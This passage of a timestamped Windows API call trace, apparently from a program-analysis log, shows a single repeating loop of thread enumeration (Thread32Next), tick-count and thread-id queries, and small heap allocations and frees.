GetCurrentThreadId () returned 0xab0 [0175.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.682] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.682] GetTickCount () returned 0x1172613 [0175.683] GetCurrentThreadId () returned 0xab0 [0175.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.683] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.683] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.684] GetTickCount () returned 0x1172613 [0175.684] GetCurrentThreadId () returned 0xab0 [0175.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.684] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.684] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.685] GetTickCount () returned 0x1172613 [0175.685] GetCurrentThreadId () returned 0xab0 [0175.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.685] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.686] GetTickCount () returned 0x1172613 [0175.686] GetCurrentThreadId () returned 0xab0 [0175.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.686] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.687] GetTickCount () returned 0x1172613 [0175.687] GetCurrentThreadId () returned 0xab0 [0175.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.687] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.688] GetTickCount () returned 0x1172613 [0175.688] GetCurrentThreadId () returned 0xab0 [0175.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.688] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.689] GetTickCount () returned 0x1172613 [0175.689] GetCurrentThreadId () returned 0xab0 [0175.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.689] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.690] GetTickCount () returned 0x1172613 [0175.690] GetCurrentThreadId () returned 0xab0 [0175.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.690] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.692] GetTickCount () returned 0x1172622 [0175.692] GetCurrentThreadId () returned 0xab0 [0175.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.692] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.693] GetTickCount () returned 0x1172622 [0175.693] GetCurrentThreadId () returned 0xab0 [0175.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.693] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.694] GetTickCount () returned 0x1172622 [0175.694] GetCurrentThreadId () returned 0xab0 [0175.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.694] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.695] GetTickCount () returned 0x1172622 [0175.695] GetCurrentThreadId () returned 0xab0 [0175.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.695] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.696] GetTickCount () returned 0x1172622 [0175.696] GetCurrentThreadId () returned 0xab0 [0175.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.696] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.697] GetTickCount () returned 0x1172622 [0175.697] GetCurrentThreadId () returned 0xab0 [0175.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.697] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.698] GetTickCount () returned 0x1172622 [0175.698] GetCurrentThreadId () returned 0xab0 [0175.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.698] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.699] GetTickCount () returned 0x1172622 [0175.699] GetCurrentThreadId () returned 0xab0 [0175.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.699] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.700] GetTickCount () returned 0x1172622 [0175.700] GetCurrentThreadId () returned 0xab0 [0175.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.700] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.701] GetTickCount () returned 0x1172622 [0175.701] GetCurrentThreadId () returned 0xab0 [0175.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.702] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.702] GetTickCount () returned 0x1172622 [0175.703] GetCurrentThreadId () returned 0xab0 [0175.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.703] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.704] GetTickCount () returned 0x1172622 [0175.704] GetCurrentThreadId () returned 0xab0 [0175.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.704] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.705] GetTickCount () returned 0x1172622 [0175.705] GetCurrentThreadId () returned 0xab0 [0175.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.705] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.706] GetTickCount () returned 0x1172622 [0175.706] GetCurrentThreadId () returned 0xab0 [0175.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.706] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.707] GetTickCount () returned 0x1172632 [0175.707] GetCurrentThreadId () returned 0xab0 [0175.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.707] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.708] GetTickCount () returned 0x1172632 [0175.708] GetCurrentThreadId () returned 0xab0 [0175.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.708] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.709] GetTickCount () returned 0x1172632 [0175.709] GetCurrentThreadId () returned 0xab0 [0175.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.709] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.710] GetTickCount () returned 0x1172632 [0175.710] GetCurrentThreadId () returned 0xab0 [0175.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.710] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.711] GetTickCount () returned 0x1172632 [0175.711] GetCurrentThreadId () returned 0xab0 [0175.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.711] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.712] GetTickCount () returned 0x1172632 [0175.712] GetCurrentThreadId () returned 0xab0 [0175.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.713] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.713] GetTickCount () returned 0x1172632 [0175.714] GetCurrentThreadId () returned 0xab0 [0175.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.714] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.715] GetTickCount () returned 0x1172632 [0175.715] GetCurrentThreadId () returned 0xab0 [0175.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.715] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.716] GetTickCount () returned 0x1172632 [0175.716] GetCurrentThreadId () returned 0xab0 [0175.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.716] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.717] GetTickCount () returned 0x1172632 [0175.717] GetCurrentThreadId () returned 0xab0 [0175.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.717] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.718] GetTickCount () returned 0x1172632 [0175.718] GetCurrentThreadId () returned 0xab0 [0175.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.718] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.719] GetTickCount () returned 0x1172632 [0175.719] GetCurrentThreadId () returned 0xab0 [0175.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.719] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.720] GetTickCount () returned 0x1172632 [0175.720] GetCurrentThreadId () returned 0xab0 [0175.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.720] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.721] GetTickCount () returned 0x1172632 [0175.721] GetCurrentThreadId () returned 0xab0 [0175.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.721] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.725] GetTickCount () returned 0x1172642 [0175.725] GetCurrentThreadId () returned 0xab0 [0175.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.725] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.726] GetTickCount () returned 0x1172642 [0175.726] GetCurrentThreadId () returned 0xab0 [0175.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.726] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.727] GetTickCount () returned 0x1172642 [0175.727] GetCurrentThreadId () returned 0xab0 [0175.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.727] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.728] GetTickCount () returned 0x1172642 [0175.728] GetCurrentThreadId () returned 0xab0 [0175.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.728] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.729] GetTickCount () returned 0x1172642 [0175.729] GetCurrentThreadId () returned 0xab0 [0175.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.729] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.730] GetTickCount () returned 0x1172642 [0175.730] GetCurrentThreadId () returned 0xab0 [0175.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.730] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.731] GetTickCount () returned 0x1172642 [0175.731] GetCurrentThreadId () returned 0xab0 [0175.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.731] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.732] GetTickCount () returned 0x1172642 [0175.732] GetCurrentThreadId () returned 0xab0 [0175.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.732] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.733] GetTickCount () returned 0x1172642 [0175.733] GetCurrentThreadId () returned 0xab0 [0175.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.733] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.734] GetTickCount () returned 0x1172642 [0175.734] GetCurrentThreadId () returned 0xab0 [0175.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.734] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.735] GetTickCount () returned 0x1172642 [0175.735] GetCurrentThreadId () returned 0xab0 [0175.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.735] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.736] GetTickCount () returned 0x1172642 [0175.736] GetCurrentThreadId () returned 0xab0 [0175.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.736] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.737] GetTickCount () returned 0x1172651 [0175.737] GetCurrentThreadId () returned 0xab0 [0175.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.738] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.739] GetTickCount () returned 0x1172651 [0175.739] GetCurrentThreadId () returned 0xab0 [0175.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.739] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.740] GetTickCount () returned 0x1172651 [0175.740] GetCurrentThreadId () returned 0xab0 [0175.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.740] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.741] GetTickCount () returned 0x1172651 [0175.741] GetCurrentThreadId () returned 0xab0 [0175.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.741] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.742] GetTickCount () returned 0x1172651 [0175.742] GetCurrentThreadId () returned 0xab0 [0175.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.742] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.743] GetTickCount () returned 0x1172651 [0175.743] GetCurrentThreadId () returned 0xab0 [0175.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.743] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.744] GetTickCount () returned 0x1172651 [0175.744] GetCurrentThreadId () returned 0xab0 [0175.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.744] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.745] GetTickCount () returned 0x1172651 [0175.745] GetCurrentThreadId () returned 0xab0 [0175.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.745] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.746] GetTickCount () returned 0x1172651 [0175.746] GetCurrentThreadId () returned 0xab0 [0175.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.746] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.747] GetTickCount () returned 0x1172651 [0175.747] GetCurrentThreadId () returned 0xab0 [0175.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.747] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.748] GetTickCount () returned 0x1172651 [0175.748] GetCurrentThreadId () returned 0xab0 [0175.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.748] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.749] GetTickCount () returned 0x1172651 [0175.749] GetCurrentThreadId () returned 0xab0 [0175.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.749] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.750] GetTickCount () returned 0x1172651 [0175.750] GetCurrentThreadId () returned 0xab0 [0175.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.750] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.751] GetTickCount () returned 0x1172651 [0175.751] GetCurrentThreadId () returned 0xab0 [0175.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.751] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.752] GetTickCount () returned 0x1172651 [0175.752] GetCurrentThreadId () returned 0xab0 [0175.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.752] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.753] GetTickCount () returned 0x1172661 [0175.753] GetCurrentThreadId () returned 0xab0 [0175.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.754] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.754] GetTickCount () returned 0x1172661 [0175.754] GetCurrentThreadId () returned 0xab0 [0175.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.755] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.755] GetTickCount () returned 0x1172661 [0175.756] GetCurrentThreadId () returned 0xab0 [0175.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.756] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.756] GetTickCount () returned 0x1172661 [0175.757] GetCurrentThreadId () returned 0xab0 [0175.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.757] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.758] GetTickCount () returned 0x1172661 [0175.758] GetCurrentThreadId () returned 0xab0 [0175.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.758] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.759] GetTickCount () returned 0x1172661 [0175.759] GetCurrentThreadId () returned 0xab0 [0175.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.759] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.760] GetTickCount () returned 0x1172661 [0175.760] GetCurrentThreadId () returned 0xab0 [0175.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.760] HeapFree (in: 